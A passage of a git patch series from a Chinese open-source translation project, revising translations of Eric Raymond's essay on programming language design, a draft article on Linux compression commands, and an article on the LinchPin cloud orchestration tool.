-如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 +一些近景设计的失败案例则更加惨不忍睹。对这些案例来说,我们能够期待的最好的结果就是这种语言可以消亡的相对体面一些,被一种新的语言设计取而代之。如果这些近景设计导向的语言没有死亡而是一直被沿用下去(通常是因为转化成本过高),那么我们则会看到不断有新的特性和功能在这些语言原来的基础之上堆积起来,以保持他们的可用性和有效性。直到这种堆积把这些语言变得越来越复杂,变的危若累卵且不可理喻。是的,我说的就是 C++ 。当然, 还有 Javascript. Perl 也不例外,尽管它的设计者 Larry Walls 有不错的设计品味,避免了很多问题,让这种语言得以存活了很多年。但也正是因为 Larry Walls 的好品味,让他在最终对 Perl 的固有问题忍无可忍之后发布了全新的 Perl 6。 -这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: (1)以远近为轴,在自身和预计的未来之间选取一个最适点,然后(2)降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 +从这种角度去思考程序语言,我们则可以把语言设计中需要侧重的目标重新归纳为两部分: (1)以时间的远近为轴,在远景设计和近景设计之间选取一个符合预期的最佳平衡点;(2)降低由一种或多种语言转化为这种新语言的转入成本,这样就可以更好地吸纳其它语言的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 -在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 +在整个计算机发展史中,没有谁能比 C 语言 在选择远景和近景设计的平衡点的时候做的更完美。事实胜于雄辩,作为一种实用的主流语言,C 语言有着很长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 -当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! +当然,你可以把 C 语言的持久存在归功于文化惰性,但那是对“文化惰性”这个词的曲解,C 语言一直得以延续的真正原因是因为目前还没有人能提供另一种足够好的语言,可以抵消取代 C 语言所需要的转化成本! -相反的, C 语言低廉的内部转化成本未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN、Pascal 、汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 +相反的,C 语言低廉的内向转化成本(转入成本)并未引起大家应有的重视,C 语言几乎是唯一的一个极其多样和强大的编程工具,以至于从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN、Pascal 、汇编语言和 LISP 的编程习惯。在一九八零年代我就注意到,我常常可以根据一个 C 语言新人的编码风格判断出他之前在使用什么语言,这也从另一方面证明了 C 语言可以轻松的被其它语言的使用者所接受,并吸引他们加入进来。 -C++ 语言同样胜在它低廉的转化成本。很快,大部分新兴的语言为了降低自身转化成本,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了类 C 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 +C++ 语言同样胜在它低廉的转化成本。很快,大部分新兴的语言为了降低自身的转入成本,都纷纷参考了 C 语言的语法。值得注意的是这给未来的语言设计带来了一种影响:即新语言的设计都在尽可能的向 C 的语法靠拢,以便这种新语言可以有很低的内向转化成本(转入成本),使其他语言的使用者可以欣然接受并使用这种新语言。 -另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python 就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 +另一种降低转入成本的方法则是把一种编程语言设计的极其简单并容易入手,让那些即使是没有编程经验的人都可以轻松学会。但做到这一点并非易事。我认为只有一种语言 - Python - 成功的做到了这一点,即通过易用的设计来降低内向转化成本。对这种程序语言的设计思路我在这里一带而过,因为我并不认为一种系统级别的语言可以被设计的像 Python 一样傻瓜易用,当然我很希望我的这个论断是错的。 -今天我们在 2017 年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 +而今我们已经来到 2017 年末尾,你一定猜测我接下来会向那些 Go 语言的鼓吹者一样对 Go 大加赞赏一番,然后激怒那些对 Go 不厌其烦的人群。但其实我的观点恰恰相反,我认为 Go 本身很有可能在许多方面遭遇失败。Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出某些方面的改变了,Go 团队也无动于衷,这是个大问题。目前,Go 语言的 GC 延迟问题以及用以平衡延迟而牺牲掉的吞吐量,都可能会严重制约这种语言的适用范围。 -即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 +即便如此,在 Go 的设计中还是蕴含了一个让我颇为认同的远大战略目标。想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。正如我之前提到的,这个问题就是,随着软件工程项目和系统的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理故障一直是导致系统崩溃和安全漏洞的主要元凶。 -我们现在已经知道了两件十分重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 +我们现在已经认清,一种语言要想取代 C 语言,它的设计就必须遵循两个十分重要准则:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。从人类行为学的角度来纵观编程语言的历史,我们不难发现,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那设计者所做的其他部分做得再好都不算数。相反的,如果一种 C 的替代语言把转入成本过高这个问题解决地很好,即使它在其他部分做的不是最好的,人们也不会对这种语言吹毛求疵。 -这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 +而 Go 正是遵循了上述两点设计思路,虽然这个思路并不是一种完美无瑕的设计理论,也有其局限性。比如,目前 GC 延迟的问题就限制了 Go 的推广。但是 Go 目前选择了照搬 Unix 下 C 语言的传染战略,把其自身设计成一种易于转入,便于传播的语言。这样它的广泛和快速的传播就会使其迅速占领市场,从而打败那些针对远景设计的看起来更好的语言。 -当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前 20 名,在 PYPL 指数上它的成就也比 Go 差很多。 +当然,我所指的这个远景设计方案就是 Rust。我曾经在之前的一些文章中解释过我为什么认为 Rust 还没有做好和 Go 展开竞争的准备。TIBOE 和 PYPL 的语言评价指数榜也很好的证明了我的对于 Rust 的这个观点。在 TIBOE 上 Rust 从来没有进过前 20 名。而在 TIBOE 和 PYPL 两个指数榜上, Rust 都要比 Go 的表现差很多。 -五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 +五年后的 Rust 会发展的怎样还未可知。但如果 Rust 社区的开发人员对这种语言的设计抱着认真投入的态度,并愿意倾听,那么我建议他们要特别重视转入成本的问题。以我个人经历来说,目前由 C 语言转入 Rust 语言的壁垒很高,使人望而却步。如果 Corrode 之类的 Code-lifting 工具只是把 C 语言映射为不安全的 Rust 语言,那么 Corrode 这类工具也是不能解决这种转入壁垒的。或者如果有更简单的方法能够自动注释代码的所有权或生命周期,那么编译器就能把 C 代码直接映射到 Rust,人们也不再需要 Corrode 这一类工具了。目前我还不知道这个问题要如何解决,但我觉得 Rust 社区最好能够找到一种解决方案来代替 Corrode 和其同类工具。 -在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 +在最后我想强调一下,Ken Thompson 曾经有过语言设计的辉煌历史。他设计的一些语言虽然看起来只是为了解决近景问题,实际上却具有很高的质量和开放程度,让这些语言同样非常适合远景问题,非常易于被提高和拓展。当然 Unix 也是这样的, 这让我不禁暗自揣测,那些我认为的 Go 语言中乍看上去不利于其远景发展的一些令人担忧烦扰的设计(例如缺乏泛型)也许并没有我想象的那样糟糕。如果确如我所认为的那样,即这些设计会影响 Go 的远景发展,那么恐怕我真的是比 Ken 还要聪明有远见了。但是我并不认为我有那么高明。Go 的前途我们还是只能拭目以待。 -------------------------------------------------------------------------------- via: http://esr.ibiblio.org/?p=7745 作者:[Eric Raymond][a] -译者:[Valoniakim](https://github.com/Valoniakim) -校对:[wxy](https://github.com/wxy) +译者:[Valoniakim](https://github.com/Valoniakim),[yunfengHe](https://github.com/yunfengHe) +校对:[yunfengHe](https://github.com/yunfengHe),[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From eedb1d959958d11c6b733e7ffc1ceb5e0a024045 Mon Sep 17 00:00:00 2001 From: Lonaparte_CHENG Date: Thu, 21 Dec 2017 12:19:30 +0100 Subject: [PATCH 0741/1627] Translating --- .../20171218 What Are Containers and Why Should You Care-.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171218 What Are Containers and Why Should You Care-.md b/sources/tech/20171218 What Are Containers and Why Should You Care-.md index 76c7bde415..b8d8525618 100644 --- a/sources/tech/20171218 What Are Containers and Why Should You Care-.md +++ b/sources/tech/20171218 What Are Containers and Why Should You Care-.md @@ -1,3 +1,5 @@ +Translating by lonaparte + What Are Containers and Why Should You Care? ====== What are containers? Do you need them? Why? In this article, we aim to answer some of these basic questions. From e847a5a0b35bb1f106ab781b146c83985f0b6d34 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Thu, 21 Dec 2017 19:20:25 +0800 Subject: [PATCH 0742/1627] =?UTF-8?q?20171118=20=E6=A0=A1=E5=AF=B9?= =?UTF-8?q?=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20171118 Language engineering for great justice.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171118 Language engineering for great justice.md b/translated/tech/20171118 Language engineering for great justice.md index 97f44dcfe0..2dd4f8a518 100644 --- a/translated/tech/20171118 Language engineering for great justice.md +++ b/translated/tech/20171118 Language engineering for great justice.md @@ -37,7 +37,7 @@ C++ 语言同样胜在它低廉的转化成本。很快,大部分新兴的语 而 Go 正是遵循了上述两点设计思路,虽然这个思路并不是一种完美无瑕的设计理论,也有其局限性。比如,目前 GC 延迟的问题就限制了 Go 的推广。但是 Go 目前选择了照搬 Unix 下 C 语言的传染战略,把其自身设计成一种易于转入,便于传播的语言。这样它的广泛和快速的传播就会使其迅速占领市场,从而打败那些针对远景设计的看起来更好的语言。 -当然,我所指的这个远景设计方案就是 Rust。我曾经在之前的一些文章中解释过我为什么认为 Rust 还没有做好和 Go 展开竞争的准备。TIBOE 和 PYPL 的语言评价指数榜也很好的证明了我的对于 Rust 的这个观点。在 TIBOE 上 Rust 从来没有进过前 20 名。而在 TIBOE 和 PYPL 两个指数榜上, Rust 都要比 Go 的表现差很多。 +当然,我所指的这个远景设计方案就是 Rust。而 Rust 的自身定位也正是一种远景和长期的 C 语言替代方案。我曾经在之前的一些文章中解释过我为什么认为 Rust 还没有做好和 Go 展开竞争的准备。TIBOE 和 PYPL 的语言评价指数榜也很好的证明了我的对于 Rust 的这个观点。在 TIBOE 上 Rust 从来没有进过前 20 名。而在 TIBOE 和 PYPL 两个指数榜上, Rust 都要比 Go 的表现差很多。 五年后的 Rust 会发展的怎样还未可知。但如果 Rust 社区的开发人员对这种语言的设计抱着认真投入的态度,并愿意倾听,那么我建议他们要特别重视转入成本的问题。以我个人经历来说,目前由 C 语言转入 Rust 语言的壁垒很高,使人望而却步。如果 Corrode 之类的 Code-lifting 工具只是把 C 语言映射为不安全的 Rust 语言,那么 Corrode 这类工具也是不能解决这种转入壁垒的。或者如果有更简单的方法能够自动注释代码的所有权或生命周期,那么编译器就能把 C 代码直接映射到 Rust,人们也不再需要 Corrode 这一类工具了。目前我还不知道这个问题要如何解决,但我觉得 Rust 社区最好能够找到一种解决方案来代替 Corrode 和其同类工具。 From 90ce6f17143614bed143944ee974d41737fa9290 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Thu, 21 Dec 2017 19:32:59 +0800 Subject: [PATCH 0743/1627] =?UTF-8?q?20171118=20=E6=A0=A1=E5=AF=B9?= =?UTF-8?q?=E5=AE=8C=E6=AF=95=EF=BC=8C=E9=A2=98=E7=9B=AE=E9=87=8D=E8=AF=91?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20171118 Language engineering for great justice.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171118 Language engineering for great justice.md b/translated/tech/20171118 Language engineering for great justice.md index 2dd4f8a518..2da49da481 100644 --- a/translated/tech/20171118 Language engineering for great justice.md +++ b/translated/tech/20171118 Language engineering for great justice.md @@ -1,4 +1,4 @@ -ESR:程序语言设计的真谛 +ESR:程序语言设计的要诣和真谛 ============================================================ 当你真正掌握了整体化的工程设计思维时,你就会发现高屋建瓴的工程设计已经远远超越了技术优化的层面。我们的每一件创造都催生于人类活动的大背景下,被这种人类活动赋予了广泛的经济学意义、社会学意义,甚至于具有了奥地利经济学家所称的“人类行为学意义praxeology”。而这种人类行为学意义则是明确的人类行为所能达到的最高层次。 From 51c9666fe88dcc8f97556528f68960ba04555f74 Mon Sep 17 00:00:00 2001 From: Ocputs <15391606236@163.com> Date: Thu, 21 Dec 2017 22:41:30 +0800 Subject: [PATCH 0744/1627] translate not complete --- .../tech/如何最大程度的压缩Linux文件.md | 69 +++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 translated/tech/如何最大程度的压缩Linux文件.md diff --git a/translated/tech/如何最大程度的压缩Linux文件.md b/translated/tech/如何最大程度的压缩Linux文件.md new file mode 100644 index 0000000000..2f7b0e20b3 --- /dev/null +++ b/translated/tech/如何最大程度的压缩Linux文件.md @@ -0,0 +1,69 @@ +# 如何最大程度的压缩Linux文件 + 如果你对 linux 系统下的对文件压缩命令或操作有任何疑问 ,你应该看一下 *apropos compress* 这个命令的输出 ;如果你有机会这么做 ,你会惊异于有如此的的命令来进行压缩文件和解压缩文件 ;还有许多命令来进行压缩文件的比较 ,检验 ,并且能够在压缩文件中的内容中进行搜索 ,甚至能够把压缩文件从一个格式变成另外一种格式 ( *.z 格式变为 *.gz 格式 ) 。 + 你想在所有词目中寻找一组 bzip2 的压缩命令 。加上 zip ,gzip ,和 xz 。你将对下面的操作感兴趣。 + ``` + $ apropos compress | grep ^bz + bzcat (1) - decompresses files to stdout + bzcmp (1) - compare bzip2 compressed files + bzdiff (1) - compare bzip2 compressed files + bzegrep (1) - search possibly bzip2 compressed files for a regular expression + bzexe (1) - compress executable files in place + bzfgrep (1) - search possibly bzip2 compressed files for a regular expression + bzgrep (1) - search possibly bzip2 compressed files for a regular expression + bzip2 (1) - a block-sorting file compressor, v1.0.6 + bzless (1) - file perusal filter for crt viewing of bzip2 compressed text + bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text + ``` + 在我的Ubuntu系统上 ,列出了超过 60 条命令作为 apropos compress 命令的返回 。 + + ## 压缩算法 + 压缩并没有普适的方案 ,某些压缩工具是有损耗的 ,例如能够使 mp3 文件减小大小而能够是听者有接近聆听原声的音乐感受 。但是算法能够用 Linux 命令行压缩或存档而使文件能够重新恢复原始数据 ,换句话说 ,算法能够是压缩或存档无损 。 + + 这是如何做到的 ?300 个相同的在一行的相同的字符能够被压缩成像 “300x” 。但是这种算法不会对大多数的文件产生有效的益处 。因为文件中完全随机的序列要比相同字符的序列要多的多 。 压缩算法会越来越复杂和多样 ,所以在 Unix 早期压缩是第一个被介绍的 。 + + ## 在 Linux 系统上的压缩命令 + 在 Linux 系统上最常用的压缩命令是 zip ,gzip ,bzip2 ,xz 。 前面提到的常用压缩命令以同样的方式工作 。会权衡文件内容压缩程度 ,压缩花费的时间 ,压缩文件在其他你需要使用的系统上的兼容性 。 + 一些时候压缩一个文件并不会花费很多时间和性能 。在下面的例子中 ,被压缩的文件回避原始文件要大 。当在一个不是很普遍的情况下 ,尤其是在文件内容达到一定等级的随机度 。 + + ``` + $ time zip bigfile.zip bigfile + adding: bigfile (default 0% ) + real 0m0.055s + user 0m0.000s + sys 0m0.016s + $ ls -l bigfile* + -rw-r--r-- 1 root root 0 12月 20 22:36 bigfile + -rw------- 1 root root 164 12月 20 22:41 bigfile.zip + ``` + 注意压缩后的文件 ( bigfile.zip ) 比源文件 ( bigfile ) 要大 。如果压缩增加了文件的大小或者减少的很少的百分比 ,那就只剩下在线备份的好处了 。如果你在压缩文件后看到了下面的信息 。你不会得到大多的益处 。 + ( defalted 1% ) + + 文件内容在文件压缩的过程中有很重要的作用 。在上面文件大小增加的例子中是因为文件内容过于随机 。压缩一个文件内容只包含 0 的文件 。你会有一个相当震惊的压缩比 。在如此极端的情况下 ,三个常用的压缩工具都有非常棒的效果 。 + + -rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt + -rw-rw-r-- 1 shs shs 49 Dec 8 17:28 zeroes.txt.bz2 + -rw-rw-r-- 1 shs shs 10219 Dec 8 17:28 zeroes.txt.gz + -rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz + -rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip + + 在压缩拉的文本文件时 ,你会发现和重要的不同 。 + $ ls -l textfile* + -rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile + -rw-rw-r-- 1 shs shs 1519807 Dec 11 18:41 textfile.bz2 + -rw-rw-r-- 1 shs shs 1977669 Dec 11 18:41 textfile.gz + -rw-rw-r-- 1 shs shs 1024700 Dec 11 18:41 textfile.xz + -rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip + + 在这种情况下 ,XZ 相较于其他压缩文件有效的减小了文件的大小 ,对于第二的 bzip2 命令也有很大的提高 。 + + ##查看压缩文件 + 以 more 结尾的命令能够让你查看压缩文件而不解压文件 。 + + bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text + lzmore (1) - view xz or lzma compressed (text) files + xzmore (1) - view xz or lzma compressed (text) files + zmore (1) - file perusal filter for crt viewing of compressed text + + 这些命令在大多数工作中被使用 ,自从不得不使文件解压缩而只为了显示给用户 。在另一方面 ,留下被解压的文件在系统中 。这些命令简单的使文件解压缩 。 + $ xzmore textfile.xz | head -1 + Here is the agenda for tomorrow's staff meeting: \ No newline at end of file From 44dc9fe45a3494c8732f6c6747ad0e5729134614 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 21 Dec 2017 22:47:14 +0800 Subject: [PATCH 0745/1627] PRF:20170630 LinchPin A simplified cloud orchestration tool using Ansible.md @qhwdw --- ... cloud orchestration tool using Ansible.md | 159 ++++++++---------- 1 file changed, 70 insertions(+), 89 deletions(-) diff --git a/translated/tech/20170630 LinchPin A simplified cloud orchestration tool using Ansible.md b/translated/tech/20170630 LinchPin A simplified cloud orchestration tool using Ansible.md index c3ed52fd19..798686c859 100644 --- a/translated/tech/20170630 LinchPin A simplified cloud orchestration tool using Ansible.md +++ b/translated/tech/20170630 LinchPin A simplified cloud orchestration tool using Ansible.md @@ -1,37 +1,27 @@ -LinchPin:一个使用 Ansible 的简化的编排工具 +LinchPin:一个使用 Ansible 的简化的编配工具 ============================================================ -### 2016年开始的 LinchPin,现在已经拥有一个 Python API 和一个成长中的社区。 +> 2016 年末开始的 LinchPin,现在已经拥有一个 Python API 和一个成长中的社区。 - -![LinchPin 1.0:一个使用 Ansible 的成熟的混合云编排工具](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/toolbox-learn-draw-container-yearbook.png?itok=2XFy0htN "LinchPin 1.0: A maturing hybrid cloud orchestration tool using Ansible") +![LinchPin 1.0:一个使用 Ansible 的成熟的混合云编配工具](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/toolbox-learn-draw-container-yearbook.png?itok=xDbwz1pP "LinchPin 1.0: A maturing hybrid cloud orchestration tool using Ansible") + >Image by : [Internet Archive Book Images][10]. Modified by Opensource.com. CC BY-SA 4.0 -过去的一年里,[我的团队公布了][11] [LinchPin][12],一个使用 Ansible 的混合[云][13]编排工具。准备云资源从来没有这么容易或更快。Ansible 强力支持的 LinchPin,专注于简化,在用户指尖下,将有更多的可用云资源。在这篇文章中,我将介绍 LinchPin,并且去看看过去的 10 个月,有多少成熟的项目。 +去年,[我的团队公布了][11] [LinchPin][12],这是一个使用 Ansible 的混合云编配orchestration工具。配给provision云资源从来没有这么容易便捷过。借助 Ansible 强力支持,LinchPin 专注于简化,使云资源让用户可以触手可及。在这篇文章中,我将介绍 LinchPin,并且去看看过去的 10 个月该项目是如何逐渐成熟。 + +(LCTT 译注:关于 orchestration 应该翻译成惯例的“编排”还是“编配”,有个 @wffger 提出的[建议](https://github.com/LCTT/TranslateProject/issues/6715) ,欢迎大家参与讨论。) -LinchPin 刚被引入的时候,使用 **ansible-playbook** 命令去运行 LinchPin ,虽然可以完成,但是还是很复杂的,LinchPin 现在有一个前端命令行用户界面(CLI),它是在 [Click][14] 中写的,而且它使 LinchPin 比以前更简单。 +LinchPin 刚出现的时候,使用 `ansible-playbook` 命令去运行 LinchPin ,虽然可以完成,但是还是很复杂的,LinchPin 现在有一个前端命令行用户界面(CLI),它是用 [Click][14] 写的,而且它使 LinchPin 比以前更简化。 -探索开源云 +没有止步于 CLI,LinchPin 现在还有一个 [Python][15] API,它可以用于管理资源,比如,Amazon EC2 和 OpenStack 实例、网络、存储、安全组等等。这个 API [文档][16] 可以在你想去尝试 LinchPin 的 Python API 时帮助你。 -* [云是什么?][1] +### Playbook 是一个库 -* [OpenStack 是什么?][2] - -* [Kubernetes 是什么?][3] - -* [为什么操作系统对容器很重要?][4] - -* [保持 Linux 容器的安全][5] - -为了不落后于 CLI,LinchPin 现在也有一个 [Python][15] API,它可以被用于管理资源,比如,Amazon EC2 和 OpenStack 实例、网络、存储、安全组、等等。这个 API [文档][16] 可以在你想去尝试 LinchPin 的 Python API 时帮助你。 - -### Playbooks 作为一个库 - -因为 LinchPin 的核心 bits 是 [Ansible playbooks][17]、角色、模块、过滤器,以及任何被称为 Ansible 模块的东西都被移进 LinchPin 库中,这意味着我们可以直接调用 playbooks,但它不是资源管理的首选机制。**linchpin** 可执行文件已经成为命令行的事实上的前端。 +因为 LinchPin 的核心是 [Ansible playbook][17],其角色、模块、过滤器,以及任何被称为 Ansible 模块的东西都被移进 LinchPin 库中,这意味着我们虽然可以直接调用 playbook,但它不是资源管理的首选机制。`linchpin` 可执行文件事实上已经成为该命令行的前端。 ### 深入了解命令行 -让我们深入了解**linchpin**命令行: +让我们深入了解 `linchpin` 命令行: ``` $ linchpin @@ -57,19 +47,19 @@ Commands: 你可以立即看到一个简单的描述,以及命令的选项和参数。这个帮助的最下面的三个命令是本文的重点内容。 -### 配置 +#### 配置文件 -以前,有个名为 **linchpin_config.yml** 的文件。现在这个文件没有了,替换它的是一个 ini 形式的配置文件,称为 **linchpin.conf**。虽然这个文件可以被修改或放到别的地方,它可以放置在配置文件容易找到的库的路径中。在多数情况下,**linchpin.conf** 文件是不需要去修改的。 +之前有个名为 `linchpin_config.yml` 的文件。但现在这个文件没有了,替换它的是一个 ini 形式的配置文件,称为 `linchpin.conf`。虽然这个文件可以被修改或放到别的地方,它可以放置在配置文件容易找到的库路径中。在多数情况下,`linchpin.conf` 文件是不需要去修改的。 -### 工作空间 +#### 工作空间 -工作空间是一个定义的文件系统路径,它是一个逻辑上的资源组。一个工作空间可以认为是一个特定环境、服务组、或其它逻辑组的一个单个点。它也可以是一个所有可管理资源的大的存储容器。 +工作空间workspace是一个定义好的文件系统路径,它是一个逻辑上的资源组。一个工作空间可以认为是一个特定环境、服务组、或其它逻辑组的一个单点。它也可以是一个所有可管理资源的大的存储容器。 -工作空间在命令行上使用 **--workspace (-w)** 选项去指定,随后是工作空间路径。它也可以使用环境变量(比如,bash 中的 **$WORKSPACE**)指定。默认工作空间是当前目录。 +工作空间可以在命令行上使用 `--workspace` (`-w`) 选项去指定,随后是工作空间路径。它也可以使用环境变量指定(比如,bash 中的 `$WORKSPACE`)。默认工作空间是当前目录。 -### 初始化 (init) +#### 初始化 (`linchpin init`) -运行 **linchpin init** 将生成一个需要的目录结构,以及一个 **PinFile**、**topology**、和 **layout** 文件的示例: +运行 `linchpin init` 将生成一个需要的目录结构,以及一个 `PinFile`、`topology`、和 `layout` 文件的示例: ``` $ export WORKSPACE=/tmp/workspace @@ -89,15 +79,15 @@ $ tree └── example-topology.yml ``` -在这个时候,一个可执行的 **linchpin up** 并且提供一个 **libvirt** 虚拟机,和一个名为 **linchpin-centos71** 的网络。一个库存(inventory)将被生成,并被放在 **inventories/libvirt.inventory** 目录中。它可以通过读取 **topologies/example-topology.yml** 和收集 **topology_name** 的值了解它。 +在这个时候,可以执行 `linchpin up` ,然后提供一个 `libvirt` 虚拟机,和一个名为 `linchpin-centos71` 的网络。会生成一个库存inventory,并放在 `inventories/libvirt.inventory` 目录中。它可以通过读取 `topologies/example-topology.yml` 和 `topology_name` 的值了解它。 -### 做好准备 (linchpin up) +#### 配给provisioning (`linchpin up`) -一旦有了一个 PinFile、拓扑、和一个可选的布局,它已经做好了准备。 +一旦有了一个 PinFile、拓扑、和一个可选的布局,就可以配给provisioning了。 -我们使用 dummy 工具,因为用它去配置非常简单;它不需要任何额外的东西(认证、网络、等等)。dummy 提供创建一个临时文件,它表示配置的主机。如果临时文件没有任何数据,说明主机没有被配置,或者它已经被销毁了。 +我们使用 dummy (模拟)工具,因为用它来配给非常简单;它不需要任何额外的东西(认证、网络、等等)。dummy 配给程序会创建一个临时文件,它表示所配给的主机。如果临时文件没有任何数据,说明主机没有被配给,或者它已经被销毁了。 -dummy 提供的树像这样: +dummy 配给程序的目录树大致如下: ``` $ tree @@ -112,7 +102,7 @@ $ tree └── dummy-cluster.yml ``` -PinFile 也很简单;它指定了它的拓扑,并且可以为 **dummy1** 目标提供一个可选的布局: +PinFile 也很简单;它指定了它的拓扑,并且为 `dummy1` 目标提供一个可选的布局: ``` --- @@ -121,7 +111,7 @@ dummy1: layout: dummy-layout.yml ``` -**dummy-cluster.yml** 拓扑文件是一个引用到提供的三个 **dummy_node** 类型的资源: +`dummy-cluster.yml` 拓扑文件是一个引用,指向到配给的三个 `dummy_node` 类型的资源: ``` --- @@ -137,7 +127,7 @@ resource_groups: count: 3 ``` -执行命令 **linchpin up** 将基于上面的 **topology_name**(在这个案例中是 **dummy_cluster**)生成 **resources** 和 **inventory** 文件。 +执行命令 `linchpin up` 将基于上面的 `topology_name`(在这个案例中是 `dummy_cluster`)生成 `resources` 和 `inventory` 文件。 ``` $ linchpin up @@ -147,7 +137,7 @@ $ ls {resources,inventories}/dummy* inventories/dummy_cluster.inventory resources/dummy_cluster.output ``` -去验证 dummy 集群的资源,检查 **/tmp/dummy.hosts**: +要验证 dummy 集群的资源,可以检查 `/tmp/dummy.hosts`: ``` $ cat /tmp/dummy.hosts @@ -156,11 +146,11 @@ web-1.example.net web-2.example.net ``` -Dummy 模块为假定的(或 dummy)供应提供了一个基本工具。OpenStack、AWS EC2、Google Cloud、和更多的关于 LinchPin 的详细情况,可以去看[示例][18]。 +Dummy 模块为假定的(或模拟的)配给提供了一个基本工具。关于在 OpenStack、AWS 